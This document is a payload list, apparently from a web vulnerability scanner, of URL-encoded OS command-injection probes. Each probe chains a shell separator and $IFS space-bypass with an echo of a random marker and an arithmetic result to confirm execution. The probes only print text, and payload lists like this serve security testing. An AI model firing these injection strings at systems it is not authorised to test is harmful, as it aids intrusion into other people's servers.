+os-command-injection,'echo$IFSRVGTQR$((51%2B29))$(echo$IFSRVGTQR)RVGTQR|' +os-command-injection,'%20echo%20EYXSLH$((96%2B88))$(echo%20EYXSLH)EYXSLH|' +os-command-injection,';echo$IFSNXMKIN$((19%2B24))$(echo$IFSNXMKIN)NXMKIN|' +os-command-injection,'&echo$IFSXDFWBW$((45%2B98))$(echo$IFSXDFWBW)XDFWBW|' +os-command-injection,'|echo$IFSKQQQWP$((52%2B17))$(echo$IFSKQQQWP)KQQQWP|' +os-command-injection,'||echo$IFSGIFLOU$((73%2B67))$(echo$IFSGIFLOU)GIFLOU|' +os-command-injection,'&&echo$IFSYPPVOY$((46%2B66))$(echo$IFSYPPVOY)YPPVOY|' +os-command-injection,'%0aecho$IFSXLQCAL$((78%2B24))$(echo$IFSXLQCAL)XLQCAL|' +os-command-injection,'%3Becho$IFSTWQPEL$((97%2B38))$(echo$IFSTWQPEL)TWQPEL|' +os-command-injection,'%26echo$IFSGUZCFQ$((77%2B81))$(echo$IFSGUZCFQ)GUZCFQ|' +os-command-injection,'%26%26echo$IFSLJOFVO$((24%2B48))$(echo$IFSLJOFVO)LJOFVO|' +os-command-injection,'%7Cecho$IFSMCDDQX$((44%2B84))$(echo$IFSMCDDQX)MCDDQX|' +os-command-injection,'%7C%7Cecho$IFSGCTODU$((64%2B18))$(echo$IFSGCTODU)GCTODU|' +os-command-injection,'echo$IFSIEJMEW$((30%2B85))$(echo$IFSIEJMEW)IEJMEW%27' +os-command-injection,'%20echo%20RTIRFH$((5%2B80))$(echo%20RTIRFH)RTIRFH%27' +os-command-injection,';echo$IFSMTICKY$((40%2B79))$(echo$IFSMTICKY)MTICKY%27' +os-command-injection,'&echo$IFSPSIGPS$((6%2B9))$(echo$IFSPSIGPS)PSIGPS%27' +os-command-injection,'|echo$IFSDVQOYX$((82%2B10))$(echo$IFSDVQOYX)DVQOYX%27' +os-command-injection,'||echo$IFSTFMZPK$((99%2B59))$(echo$IFSTFMZPK)TFMZPK%27' +os-command-injection,'&&echo$IFSZENPOV$((15%2B5))$(echo$IFSZENPOV)ZENPOV%27' +os-command-injection,'%0aecho$IFSFXFLFR$((67%2B52))$(echo$IFSFXFLFR)FXFLFR%27' +os-command-injection,'%3Becho$IFSLZZDLP$((79%2B69))$(echo$IFSLZZDLP)LZZDLP%27' +os-command-injection,'%26echo$IFSQGKCTR$((36%2B15))$(echo$IFSQGKCTR)QGKCTR%27' +os-command-injection,'%26%26echo$IFSNCHUMN$((98%2B30))$(echo$IFSNCHUMN)NCHUMN%27' +os-command-injection,'%7Cecho$IFSGUAVSF$((73%2B82))$(echo$IFSGUAVSF)GUAVSF%27' +os-command-injection,'%7C%7Cecho$IFSOQAOQJ$((62%2B26))$(echo$IFSOQAOQJ)OQAOQJ%27' +os-command-injection,'echo$IFSJIKZPM$((54%2B42))$(echo$IFSJIKZPM)JIKZPM%22' +os-command-injection,'%20echo%20XQIFQU$((35%2B24))$(echo%20XQIFQU)XQIFQU%22' +os-command-injection,';echo$IFSXKJHCR$((60%2B67))$(echo$IFSXKJHCR)XKJHCR%22' +os-command-injection,'&echo$IFSAKVCNQ$((27%2B21))$(echo$IFSAKVCNQ)AKVCNQ%22' +os-command-injection,'|echo$IFSOLRTPJ$((84%2B81))$(echo$IFSOLRTPJ)OLRTPJ%22' +os-command-injection,'||echo$IFSBEZGQL$((84%2B6))$(echo$IFSBEZGQL)BEZGQL%22' +os-command-injection,'&&echo$IFSAUBGIO$((90%2B39))$(echo$IFSAUBGIO)AUBGIO%22' +os-command-injection,'%0aecho$IFSQSKWMC$((77%2B87))$(echo$IFSQSKWMC)QSKWMC%22' +os-command-injection,'%3Becho$IFSVSJXTC$((59%2B79))$(echo$IFSVSJXTC)VSJXTC%22' +os-command-injection,'%26echo$IFSFXPYJN$((43%2B47))$(echo$IFSFXPYJN)FXPYJN%22' +os-command-injection,'%26%26echo$IFSZFLJBI$((82%2B4))$(echo$IFSZFLJBI)ZFLJBI%22' +os-command-injection,'%7Cecho$IFSIWTKTR$((97%2B63))$(echo$IFSIWTKTR)IWTKTR%22' +os-command-injection,'%7C%7Cecho$IFSOQUJVO$((83%2B79))$(echo$IFSOQUJVO)OQUJVO%22' +os-command-injection,'echo$IFSKNEEFY$((64%2B22))$(echo$IFSKNEEFY)KNEEFY%5C%5C' +os-command-injection,'%20echo%20NWXHAH$((8%2B91))$(echo%20NWXHAH)NWXHAH%5C%5C' +os-command-injection,';echo$IFSBFZZSW$((3%2B5))$(echo$IFSBFZZSW)BFZZSW%5C%5C' +os-command-injection,'&echo$IFSROVZMD$((87%2B57))$(echo$IFSROVZMD)ROVZMD%5C%5C' +os-command-injection,'|echo$IFSKMAXDB$((68%2B24))$(echo$IFSKMAXDB)KMAXDB%5C%5C' +os-command-injection,'||echo$IFSVNXMDZ$((95%2B0))$(echo$IFSVNXMDZ)VNXMDZ%5C%5C' +os-command-injection,'&&echo$IFSXUVPOU$((27%2B3))$(echo$IFSXUVPOU)XUVPOU%5C%5C' +os-command-injection,'%0aecho$IFSZFETQZ$((73%2B0))$(echo$IFSZFETQZ)ZFETQZ%5C%5C' +os-command-injection,'%3Becho$IFSMLEFQQ$((44%2B34))$(echo$IFSMLEFQQ)MLEFQQ%5C%5C' +os-command-injection,'%26echo$IFSWBFNGR$((6%2B4))$(echo$IFSWBFNGR)WBFNGR%5C%5C' +os-command-injection,'%26%26echo$IFSPENFBQ$((61%2B76))$(echo$IFSPENFBQ)PENFBQ%5C%5C' +os-command-injection,'%7Cecho$IFSACIPGG$((38%2B64))$(echo$IFSACIPGG)ACIPGG%5C%5C' +os-command-injection,'%7C%7Cecho$IFSSIGJRV$((49%2B39))$(echo$IFSSIGJRV)SIGJRV%5C%5C' +os-command-injection,'echo$IFSZZSSEM$((14%2B66))$(echo$IFSZZSSEM)ZZSSEM%2F%2F' +os-command-injection,'%20echo%20APYFLP$((24%2B89))$(echo%20APYFLP)APYFLP%2F%2F' +os-command-injection,';echo$IFSGLSCFU$((80%2B7))$(echo$IFSGLSCFU)GLSCFU%2F%2F' +os-command-injection,'&echo$IFSZRWAWQ$((82%2B93))$(echo$IFSZRWAWQ)ZRWAWQ%2F%2F' +os-command-injection,'|echo$IFSSCCGYA$((3%2B93))$(echo$IFSSCCGYA)SCCGYA%2F%2F' +os-command-injection,'||echo$IFSEYVRFU$((99%2B52))$(echo$IFSEYVRFU)EYVRFU%2F%2F' +os-command-injection,'&&echo$IFSBMUAXQ$((31%2B95))$(echo$IFSBMUAXQ)BMUAXQ%2F%2F' +os-command-injection,'%0aecho$IFSERJIXU$((33%2B2))$(echo$IFSERJIXU)ERJIXU%2F%2F' +os-command-injection,'%3Becho$IFSVYLEJO$((26%2B40))$(echo$IFSVYLEJO)VYLEJO%2F%2F' +os-command-injection,'%26echo$IFSYNKNBL$((5%2B94))$(echo$IFSYNKNBL)YNKNBL%2F%2F' +os-command-injection,'%26%26echo$IFSUCPLDI$((23%2B55))$(echo$IFSUCPLDI)UCPLDI%2F%2F' +os-command-injection,'%7Cecho$IFSMZTBUS$((51%2B6))$(echo$IFSMZTBUS)MZTBUS%2F%2F' +os-command-injection,'%7C%7Cecho$IFSWPWCJS$((96%2B60))$(echo$IFSWPWCJS)WPWCJS%2F%2F' +os-command-injection,'echo$IFSVVUMIP$((18%2B35))$(echo$IFSVVUMIP)VVUMIP%26' +os-command-injection,'%20echo%20JDCGXZ$((41%2B96))$(echo%20JDCGXZ)JDCGXZ%26' +os-command-injection,';echo$IFSUTEXYG$((37%2B68))$(echo$IFSUTEXYG)UTEXYG%26' +os-command-injection,'&echo$IFSQRHEWM$((81%2B88))$(echo$IFSQRHEWM)QRHEWM%26' +os-command-injection,'|echo$IFSLADZJA$((28%2B57))$(echo$IFSLADZJA)LADZJA%26' +os-command-injection,'||echo$IFSFTKMXB$((12%2B13))$(echo$IFSFTKMXB)FTKMXB%26' +os-command-injection,'&&echo$IFSTGBJOB$((42%2B77))$(echo$IFSTGBJOB)TGBJOB%26' +os-command-injection,'%0aecho$IFSFQSEMN$((91%2B33))$(echo$IFSFQSEMN)FQSEMN%26' +os-command-injection,'%3Becho$IFSTLHIDP$((89%2B98))$(echo$IFSTLHIDP)TLHIDP%26' +os-command-injection,'%26echo$IFSZBBPPT$((70%2B6))$(echo$IFSZBBPPT)ZBBPPT%26' +os-command-injection,'%26%26echo$IFSITMNHS$((43%2B23))$(echo$IFSITMNHS)ITMNHS%26' +os-command-injection,'%7Cecho$IFSJJYVVI$((35%2B34))$(echo$IFSJJYVVI)JJYVVI%26' +os-command-injection,'%7C%7Cecho$IFSLPCDFP$((34%2B63))$(echo$IFSLPCDFP)LPCDFP%26' +os-command-injection,'echo$IFSYJNHDQ$((89%2B22))$(echo$IFSYJNHDQ)YJNHDQ%7C' +os-command-injection,'%20echo%20EEIYPU$((65%2B19))$(echo%20EEIYPU)EEIYPU%7C' +os-command-injection,';echo$IFSDWCZMD$((39%2B76))$(echo$IFSDWCZMD)DWCZMD%7C' +os-command-injection,'&echo$IFSJSBLAG$((55%2B76))$(echo$IFSJSBLAG)JSBLAG%7C' +os-command-injection,'|echo$IFSYOKOTJ$((77%2B9))$(echo$IFSYOKOTJ)YOKOTJ%7C' +os-command-injection,'||echo$IFSCNIKQI$((90%2B80))$(echo$IFSCNIKQI)CNIKQI%7C' +os-command-injection,'&&echo$IFSRZHDUN$((30%2B97))$(echo$IFSRZHDUN)RZHDUN%7C' +os-command-injection,'%0aecho$IFSCPVCLF$((68%2B4))$(echo$IFSCPVCLF)CPVCLF%7C' +os-command-injection,'%3Becho$IFSOMAEJD$((8%2B77))$(echo$IFSOMAEJD)OMAEJD%7C' +os-command-injection,'%26echo$IFSDOPRZR$((76%2B69))$(echo$IFSDOPRZR)DOPRZR%7C' +os-command-injection,'%26%26echo$IFSUEFESK$((60%2B44))$(echo$IFSUEFESK)UEFESK%7C' +os-command-injection,'%7Cecho$IFSMQMMWX$((90%2B32))$(echo$IFSMQMMWX)MQMMWX%7C' +os-command-injection,'%7C%7Cecho$IFSBVFYIU$((58%2B91))$(echo$IFSBVFYIU)BVFYIU%7C' +os-command-injection,'%27echo$IFSBUSFOU$((97%2B37))$(echo$IFSBUSFOU)BUSFOU' +os-command-injection,'%27%20echo%20LNVEVW$((12%2B50))$(echo%20LNVEVW)LNVEVW' +os-command-injection,'%27;echo$IFSCGEDHZ$((15%2B86))$(echo$IFSCGEDHZ)CGEDHZ' +os-command-injection,'%27&echo$IFSGDHEQM$((75%2B6))$(echo$IFSGDHEQM)GDHEQM' +os-command-injection,'%27|echo$IFSFRPQGH$((5%2B72))$(echo$IFSFRPQGH)FRPQGH' +os-command-injection,'%27||echo$IFSUBXJUF$((52%2B61))$(echo$IFSUBXJUF)UBXJUF' +os-command-injection,'%27&&echo$IFSQNMPMK$((16%2B94))$(echo$IFSQNMPMK)QNMPMK' +os-command-injection,'%27%0aecho$IFSHPJBTS$((68%2B1))$(echo$IFSHPJBTS)HPJBTS' +os-command-injection,'%27%3Becho$IFSOLZUHI$((11%2B76))$(echo$IFSOLZUHI)OLZUHI' +os-command-injection,'%27%26echo$IFSJWPFEA$((61%2B64))$(echo$IFSJWPFEA)JWPFEA' +os-command-injection,'%27%26%26echo$IFSYRTQWI$((45%2B7))$(echo$IFSYRTQWI)YRTQWI' +os-command-injection,'%27%7Cecho$IFSOJYTMR$((97%2B63))$(echo$IFSOJYTMR)OJYTMR' +os-command-injection,'%27%7C%7Cecho$IFSBJRIVZ$((1%2B4))$(echo$IFSBJRIVZ)BJRIVZ' +os-command-injection,'%27echo$IFSFYUXPA$((17%2B24))$(echo$IFSFYUXPA)FYUXPA'' +os-command-injection,'%27%20echo%20KFJYWO$((38%2B75))$(echo%20KFJYWO)KFJYWO'' +os-command-injection,'%27;echo$IFSUEBNRK$((21%2B43))$(echo$IFSUEBNRK)UEBNRK'' +os-command-injection,'%27&echo$IFSDSFELH$((48%2B16))$(echo$IFSDSFELH)DSFELH'' +os-command-injection,'%27|echo$IFSCJAOLS$((84%2B11))$(echo$IFSCJAOLS)CJAOLS'' +os-command-injection,'%27||echo$IFSXGULGC$((75%2B10))$(echo$IFSXGULGC)XGULGC'' +os-command-injection,'%27&&echo$IFSOACPHB$((5%2B90))$(echo$IFSOACPHB)OACPHB'' +os-command-injection,'%27%0aecho$IFSXIUKHX$((92%2B44))$(echo$IFSXIUKHX)XIUKHX'' +os-command-injection,'%27%3Becho$IFSQSZIFF$((21%2B56))$(echo$IFSQSZIFF)QSZIFF'' +os-command-injection,'%27%26echo$IFSVDFJNU$((23%2B92))$(echo$IFSVDFJNU)VDFJNU'' +os-command-injection,'%27%26%26echo$IFSJDHREU$((48%2B43))$(echo$IFSJDHREU)JDHREU'' +os-command-injection,'%27%7Cecho$IFSRWDBVK$((60%2B13))$(echo$IFSRWDBVK)RWDBVK'' +os-command-injection,'%27%7C%7Cecho$IFSHNNQHD$((64%2B5))$(echo$IFSHNNQHD)HNNQHD'' +os-command-injection,'%27echo$IFSOXXBHC$((79%2B27))$(echo$IFSOXXBHC)OXXBHC"' +os-command-injection,'%27%20echo%20RCKFYK$((92%2B33))$(echo%20RCKFYK)RCKFYK"' +os-command-injection,'%27;echo$IFSFQQLKE$((2%2B42))$(echo$IFSFQQLKE)FQQLKE"' +os-command-injection,'%27&echo$IFSHKZBYJ$((43%2B76))$(echo$IFSHKZBYJ)HKZBYJ"' +os-command-injection,'%27|echo$IFSXRLZPA$((20%2B95))$(echo$IFSXRLZPA)XRLZPA"' +os-command-injection,'%27||echo$IFSLYKBHC$((81%2B81))$(echo$IFSLYKBHC)LYKBHC"' +os-command-injection,'%27&&echo$IFSHDYGZO$((21%2B59))$(echo$IFSHDYGZO)HDYGZO"' +os-command-injection,'%27%0aecho$IFSDOHOCR$((5%2B11))$(echo$IFSDOHOCR)DOHOCR"' +os-command-injection,'%27%3Becho$IFSVMLEXC$((19%2B49))$(echo$IFSVMLEXC)VMLEXC"' +os-command-injection,'%27%26echo$IFSHNQWXR$((73%2B6))$(echo$IFSHNQWXR)HNQWXR"' +os-command-injection,'%27%26%26echo$IFSJPJHMZ$((45%2B17))$(echo$IFSJPJHMZ)JPJHMZ"' +os-command-injection,'%27%7Cecho$IFSWNRKQX$((15%2B90))$(echo$IFSWNRKQX)WNRKQX"' +os-command-injection,'%27%7C%7Cecho$IFSGVINFF$((91%2B35))$(echo$IFSGVINFF)GVINFF"' +os-command-injection,'%27echo$IFSISEHFM$((85%2B7))$(echo$IFSISEHFM)ISEHFM' +os-command-injection,'%27%20echo%20RFTTCP$((93%2B3))$(echo%20RFTTCP)RFTTCP' +os-command-injection,'%27;echo$IFSNHOFBW$((39%2B34))$(echo$IFSNHOFBW)NHOFBW' +os-command-injection,'%27&echo$IFSOZTHGM$((17%2B60))$(echo$IFSOZTHGM)OZTHGM' +os-command-injection,'%27|echo$IFSUJIVOM$((80%2B49))$(echo$IFSUJIVOM)UJIVOM' +os-command-injection,'%27||echo$IFSWKWPWF$((88%2B99))$(echo$IFSWKWPWF)WKWPWF' +os-command-injection,'%27&&echo$IFSOVRJWM$((23%2B86))$(echo$IFSOVRJWM)OVRJWM' +os-command-injection,'%27%0aecho$IFSTWUNTD$((44%2B76))$(echo$IFSTWUNTD)TWUNTD' +os-command-injection,'%27%3Becho$IFSIFOFAH$((63%2B44))$(echo$IFSIFOFAH)IFOFAH' +os-command-injection,'%27%26echo$IFSUEVCYJ$((85%2B1))$(echo$IFSUEVCYJ)UEVCYJ' +os-command-injection,'%27%26%26echo$IFSEWMPRK$((42%2B18))$(echo$IFSEWMPRK)EWMPRK' +os-command-injection,'%27%7Cecho$IFSYKIMMG$((43%2B81))$(echo$IFSYKIMMG)YKIMMG' +os-command-injection,'%27%7C%7Cecho$IFSCJHVPM$((51%2B52))$(echo$IFSCJHVPM)CJHVPM' +os-command-injection,'%27echo$IFSKCWCVA$((72%2B1))$(echo$IFSKCWCVA)KCWCVA//' +os-command-injection,'%27%20echo%20AUYIEK$((56%2B8))$(echo%20AUYIEK)AUYIEK//' +os-command-injection,'%27;echo$IFSOTEELC$((4%2B24))$(echo$IFSOTEELC)OTEELC//' +os-command-injection,'%27&echo$IFSZQMJNG$((96%2B27))$(echo$IFSZQMJNG)ZQMJNG//' +os-command-injection,'%27|echo$IFSKGTHSZ$((31%2B23))$(echo$IFSKGTHSZ)KGTHSZ//' +os-command-injection,'%27||echo$IFSOQCUYN$((22%2B3))$(echo$IFSOQCUYN)OQCUYN//' +os-command-injection,'%27&&echo$IFSKQBPBW$((96%2B27))$(echo$IFSKQBPBW)KQBPBW//' +os-command-injection,'%27%0aecho$IFSDLBZBO$((23%2B48))$(echo$IFSDLBZBO)DLBZBO//' +os-command-injection,'%27%3Becho$IFSCFBNIF$((41%2B28))$(echo$IFSCFBNIF)CFBNIF//' +os-command-injection,'%27%26echo$IFSJMGRNT$((10%2B51))$(echo$IFSJMGRNT)JMGRNT//' +os-command-injection,'%27%26%26echo$IFSLVYIOD$((15%2B38))$(echo$IFSLVYIOD)LVYIOD//' +os-command-injection,'%27%7Cecho$IFSWWFYLU$((17%2B21))$(echo$IFSWWFYLU)WWFYLU//' +os-command-injection,'%27%7C%7Cecho$IFSRRGUPN$((69%2B6))$(echo$IFSRRGUPN)RRGUPN//' +os-command-injection,'%27echo$IFSQTYJUU$((57%2B7))$(echo$IFSQTYJUU)QTYJUU\' +os-command-injection,'%27%20echo%20NPYOVU$((6%2B61))$(echo%20NPYOVU)NPYOVU\' +os-command-injection,'%27;echo$IFSIZUWXV$((86%2B66))$(echo$IFSIZUWXV)IZUWXV\' +os-command-injection,'%27&echo$IFSLRYHAU$((84%2B4))$(echo$IFSLRYHAU)LRYHAU\' +os-command-injection,'%27|echo$IFSYHECUO$((78%2B29))$(echo$IFSYHECUO)YHECUO\' +os-command-injection,'%27||echo$IFSRIFFSO$((66%2B74))$(echo$IFSRIFFSO)RIFFSO\' +os-command-injection,'%27&&echo$IFSKITBIZ$((2%2B45))$(echo$IFSKITBIZ)KITBIZ\' +os-command-injection,'%27%0aecho$IFSMNPQOV$((53%2B67))$(echo$IFSMNPQOV)MNPQOV\' +os-command-injection,'%27%3Becho$IFSBXCHUC$((98%2B22))$(echo$IFSBXCHUC)BXCHUC\' +os-command-injection,'%27%26echo$IFSHBDZXC$((96%2B3))$(echo$IFSHBDZXC)HBDZXC\' +os-command-injection,'%27%26%26echo$IFSBVHNWZ$((43%2B2))$(echo$IFSBVHNWZ)BVHNWZ\' +os-command-injection,'%27%7Cecho$IFSFCLIWQ$((68%2B57))$(echo$IFSFCLIWQ)FCLIWQ\' +os-command-injection,'%27%7C%7Cecho$IFSCKVBFP$((70%2B7))$(echo$IFSCKVBFP)CKVBFP\' +os-command-injection,'%27echo$IFSENOPZR$((31%2B41))$(echo$IFSENOPZR)ENOPZR&' +os-command-injection,'%27%20echo%20ENKTWS$((18%2B26))$(echo%20ENKTWS)ENKTWS&' +os-command-injection,'%27;echo$IFSXFMQSA$((31%2B54))$(echo$IFSXFMQSA)XFMQSA&' +os-command-injection,'%27&echo$IFSEJMOPP$((83%2B86))$(echo$IFSEJMOPP)EJMOPP&' +os-command-injection,'%27|echo$IFSMCIDIP$((54%2B31))$(echo$IFSMCIDIP)MCIDIP&' +os-command-injection,'%27||echo$IFSVGJPPI$((78%2B43))$(echo$IFSVGJPPI)VGJPPI&' +os-command-injection,'%27&&echo$IFSRURCZX$((52%2B67))$(echo$IFSRURCZX)RURCZX&' +os-command-injection,'%27%0aecho$IFSNUAPKN$((22%2B15))$(echo$IFSNUAPKN)NUAPKN&' +os-command-injection,'%27%3Becho$IFSRZLSCU$((35%2B98))$(echo$IFSRZLSCU)RZLSCU&' +os-command-injection,'%27%26echo$IFSPGDDIP$((30%2B43))$(echo$IFSPGDDIP)PGDDIP&' +os-command-injection,'%27%26%26echo$IFSSFCCJW$((70%2B23))$(echo$IFSSFCCJW)SFCCJW&' +os-command-injection,'%27%7Cecho$IFSBBTQTF$((39%2B3))$(echo$IFSBBTQTF)BBTQTF&' +os-command-injection,'%27%7C%7Cecho$IFSAEDQZA$((27%2B88))$(echo$IFSAEDQZA)AEDQZA&' +os-command-injection,'%27echo$IFSNSNDEQ$((93%2B51))$(echo$IFSNSNDEQ)NSNDEQ|' +os-command-injection,'%27%20echo%20KLCYYE$((89%2B0))$(echo%20KLCYYE)KLCYYE|' +os-command-injection,'%27;echo$IFSRNDFJD$((90%2B55))$(echo$IFSRNDFJD)RNDFJD|' +os-command-injection,'%27&echo$IFSXNSQSX$((90%2B70))$(echo$IFSXNSQSX)XNSQSX|' +os-command-injection,'%27|echo$IFSNIHTHK$((9%2B70))$(echo$IFSNIHTHK)NIHTHK|' +os-command-injection,'%27||echo$IFSBLPPXU$((2%2B17))$(echo$IFSBLPPXU)BLPPXU|' +os-command-injection,'%27&&echo$IFSOOJWHW$((27%2B7))$(echo$IFSOOJWHW)OOJWHW|' +os-command-injection,'%27%0aecho$IFSONEZGX$((68%2B29))$(echo$IFSONEZGX)ONEZGX|' +os-command-injection,'%27%3Becho$IFSCJUMYI$((23%2B49))$(echo$IFSCJUMYI)CJUMYI|' +os-command-injection,'%27%26echo$IFSOZMCUX$((65%2B38))$(echo$IFSOZMCUX)OZMCUX|' +os-command-injection,'%27%26%26echo$IFSFYRIYE$((49%2B44))$(echo$IFSFYRIYE)FYRIYE|' +os-command-injection,'%27%7Cecho$IFSNSAIBB$((53%2B67))$(echo$IFSNSAIBB)NSAIBB|' +os-command-injection,'%27%7C%7Cecho$IFSXNUTZK$((27%2B45))$(echo$IFSXNUTZK)XNUTZK|' +os-command-injection,'%27echo$IFSOFNFSY$((33%2B29))$(echo$IFSOFNFSY)OFNFSY%27' +os-command-injection,'%27%20echo%20WBRAYT$((68%2B32))$(echo%20WBRAYT)WBRAYT%27' +os-command-injection,'%27;echo$IFSHOOXVC$((69%2B30))$(echo$IFSHOOXVC)HOOXVC%27' +os-command-injection,'%27&echo$IFSBBRTZG$((50%2B1))$(echo$IFSBBRTZG)BBRTZG%27' +os-command-injection,'%27|echo$IFSPDOCRP$((90%2B89))$(echo$IFSPDOCRP)PDOCRP%27' +os-command-injection,'%27||echo$IFSMYGHXG$((70%2B58))$(echo$IFSMYGHXG)MYGHXG%27' +os-command-injection,'%27&&echo$IFSIIHKFG$((7%2B64))$(echo$IFSIIHKFG)IIHKFG%27' +os-command-injection,'%27%0aecho$IFSYAFSKC$((98%2B11))$(echo$IFSYAFSKC)YAFSKC%27' +os-command-injection,'%27%3Becho$IFSLZXFCH$((44%2B38))$(echo$IFSLZXFCH)LZXFCH%27' +os-command-injection,'%27%26echo$IFSAPFBSK$((40%2B51))$(echo$IFSAPFBSK)APFBSK%27' +os-command-injection,'%27%26%26echo$IFSFTQZAZ$((66%2B79))$(echo$IFSFTQZAZ)FTQZAZ%27' +os-command-injection,'%27%7Cecho$IFSGQCFSG$((77%2B66))$(echo$IFSGQCFSG)GQCFSG%27' +os-command-injection,'%27%7C%7Cecho$IFSLNILSC$((52%2B23))$(echo$IFSLNILSC)LNILSC%27' +os-command-injection,'%27echo$IFSFOVBLV$((51%2B93))$(echo$IFSFOVBLV)FOVBLV%22' +os-command-injection,'%27%20echo%20KEIMRP$((17%2B26))$(echo%20KEIMRP)KEIMRP%22' +os-command-injection,'%27;echo$IFSXUIGJZ$((84%2B80))$(echo$IFSXUIGJZ)XUIGJZ%22' +os-command-injection,'%27&echo$IFSBOCKFB$((70%2B90))$(echo$IFSBOCKFB)BOCKFB%22' +os-command-injection,'%27|echo$IFSMPTNCZ$((32%2B33))$(echo$IFSMPTNCZ)MPTNCZ%22' +os-command-injection,'%27||echo$IFSJZSHOM$((90%2B14))$(echo$IFSJZSHOM)JZSHOM%22' +os-command-injection,'%27&&echo$IFSRQAZYH$((37%2B77))$(echo$IFSRQAZYH)RQAZYH%22' +os-command-injection,'%27%0aecho$IFSCNBVMZ$((1%2B71))$(echo$IFSCNBVMZ)CNBVMZ%22' +os-command-injection,'%27%3Becho$IFSMGMRMA$((41%2B1))$(echo$IFSMGMRMA)MGMRMA%22' +os-command-injection,'%27%26echo$IFSLXYYNO$((16%2B12))$(echo$IFSLXYYNO)LXYYNO%22' +os-command-injection,'%27%26%26echo$IFSTZEQVF$((83%2B23))$(echo$IFSTZEQVF)TZEQVF%22' +os-command-injection,'%27%7Cecho$IFSQDDMWF$((38%2B22))$(echo$IFSQDDMWF)QDDMWF%22' +os-command-injection,'%27%7C%7Cecho$IFSDEQICN$((63%2B9))$(echo$IFSDEQICN)DEQICN%22' +os-command-injection,'%27echo$IFSYZWJVC$((52%2B73))$(echo$IFSYZWJVC)YZWJVC%5C%5C' +os-command-injection,'%27%20echo%20CKNGPL$((15%2B58))$(echo%20CKNGPL)CKNGPL%5C%5C' +os-command-injection,'%27;echo$IFSSHQCUK$((3%2B51))$(echo$IFSSHQCUK)SHQCUK%5C%5C' +os-command-injection,'%27&echo$IFSRROPXW$((41%2B77))$(echo$IFSRROPXW)RROPXW%5C%5C' +os-command-injection,'%27|echo$IFSVBZXOU$((17%2B37))$(echo$IFSVBZXOU)VBZXOU%5C%5C' +os-command-injection,'%27||echo$IFSSWPMAE$((92%2B33))$(echo$IFSSWPMAE)SWPMAE%5C%5C' +os-command-injection,'%27&&echo$IFSBTAEIF$((13%2B69))$(echo$IFSBTAEIF)BTAEIF%5C%5C' +os-command-injection,'%27%0aecho$IFSNOGTKT$((72%2B41))$(echo$IFSNOGTKT)NOGTKT%5C%5C' +os-command-injection,'%27%3Becho$IFSLXLIDX$((76%2B8))$(echo$IFSLXLIDX)LXLIDX%5C%5C' +os-command-injection,'%27%26echo$IFSUNGUOC$((43%2B21))$(echo$IFSUNGUOC)UNGUOC%5C%5C' +os-command-injection,'%27%26%26echo$IFSFRTUVD$((22%2B54))$(echo$IFSFRTUVD)FRTUVD%5C%5C' +os-command-injection,'%27%7Cecho$IFSEVZHLM$((41%2B61))$(echo$IFSEVZHLM)EVZHLM%5C%5C' +os-command-injection,'%27%7C%7Cecho$IFSJFYJHQ$((96%2B6))$(echo$IFSJFYJHQ)JFYJHQ%5C%5C' +os-command-injection,'%27echo$IFSRHCRJN$((88%2B78))$(echo$IFSRHCRJN)RHCRJN%2F%2F' +os-command-injection,'%27%20echo%20CCRTJP$((52%2B3))$(echo%20CCRTJP)CCRTJP%2F%2F' +os-command-injection,'%27;echo$IFSXUUDGE$((67%2B2))$(echo$IFSXUUDGE)XUUDGE%2F%2F' +os-command-injection,'%27&echo$IFSTZNBWT$((87%2B69))$(echo$IFSTZNBWT)TZNBWT%2F%2F' +os-command-injection,'%27|echo$IFSQJCEHO$((0%2B51))$(echo$IFSQJCEHO)QJCEHO%2F%2F' +os-command-injection,'%27||echo$IFSJIUIDF$((89%2B41))$(echo$IFSJIUIDF)JIUIDF%2F%2F' +os-command-injection,'%27&&echo$IFSEQCQBA$((18%2B65))$(echo$IFSEQCQBA)EQCQBA%2F%2F' +os-command-injection,'%27%0aecho$IFSOETQLB$((10%2B18))$(echo$IFSOETQLB)OETQLB%2F%2F' +os-command-injection,'%27%3Becho$IFSKTDMLA$((82%2B25))$(echo$IFSKTDMLA)KTDMLA%2F%2F' +os-command-injection,'%27%26echo$IFSDXNLEZ$((56%2B76))$(echo$IFSDXNLEZ)DXNLEZ%2F%2F' +os-command-injection,'%27%26%26echo$IFSDXQHAS$((90%2B85))$(echo$IFSDXQHAS)DXQHAS%2F%2F' +os-command-injection,'%27%7Cecho$IFSZXEJNO$((10%2B18))$(echo$IFSZXEJNO)ZXEJNO%2F%2F' +os-command-injection,'%27%7C%7Cecho$IFSMPGVLE$((9%2B44))$(echo$IFSMPGVLE)MPGVLE%2F%2F' +os-command-injection,'%27echo$IFSXLGSCN$((77%2B2))$(echo$IFSXLGSCN)XLGSCN%26' +os-command-injection,'%27%20echo%20DOOTQL$((40%2B84))$(echo%20DOOTQL)DOOTQL%26' +os-command-injection,'%27;echo$IFSVAUTCF$((31%2B25))$(echo$IFSVAUTCF)VAUTCF%26' +os-command-injection,'%27&echo$IFSLVUBOX$((6%2B49))$(echo$IFSLVUBOX)LVUBOX%26' +os-command-injection,'%27|echo$IFSNHYJTJ$((44%2B34))$(echo$IFSNHYJTJ)NHYJTJ%26' +os-command-injection,'%27||echo$IFSDZJSFZ$((60%2B65))$(echo$IFSDZJSFZ)DZJSFZ%26' +os-command-injection,'%27&&echo$IFSMSRADT$((94%2B98))$(echo$IFSMSRADT)MSRADT%26' +os-command-injection,'%27%0aecho$IFSEMNGCD$((37%2B86))$(echo$IFSEMNGCD)EMNGCD%26' +os-command-injection,'%27%3Becho$IFSCAUOQJ$((92%2B34))$(echo$IFSCAUOQJ)CAUOQJ%26' +os-command-injection,'%27%26echo$IFSNWJCNK$((78%2B98))$(echo$IFSNWJCNK)NWJCNK%26' +os-command-injection,'%27%26%26echo$IFSVZAYJB$((24%2B72))$(echo$IFSVZAYJB)VZAYJB%26' +os-command-injection,'%27%7Cecho$IFSQSZPWD$((73%2B91))$(echo$IFSQSZPWD)QSZPWD%26' +os-command-injection,'%27%7C%7Cecho$IFSVCFZJU$((65%2B17))$(echo$IFSVCFZJU)VCFZJU%26' +os-command-injection,'%27echo$IFSBKEPKJ$((50%2B70))$(echo$IFSBKEPKJ)BKEPKJ%7C' +os-command-injection,'%27%20echo%20UVFTTN$((65%2B44))$(echo%20UVFTTN)UVFTTN%7C' +os-command-injection,'%27;echo$IFSWZVYQZ$((68%2B9))$(echo$IFSWZVYQZ)WZVYQZ%7C' +os-command-injection,'%27&echo$IFSHXZBRD$((3%2B30))$(echo$IFSHXZBRD)HXZBRD%7C' 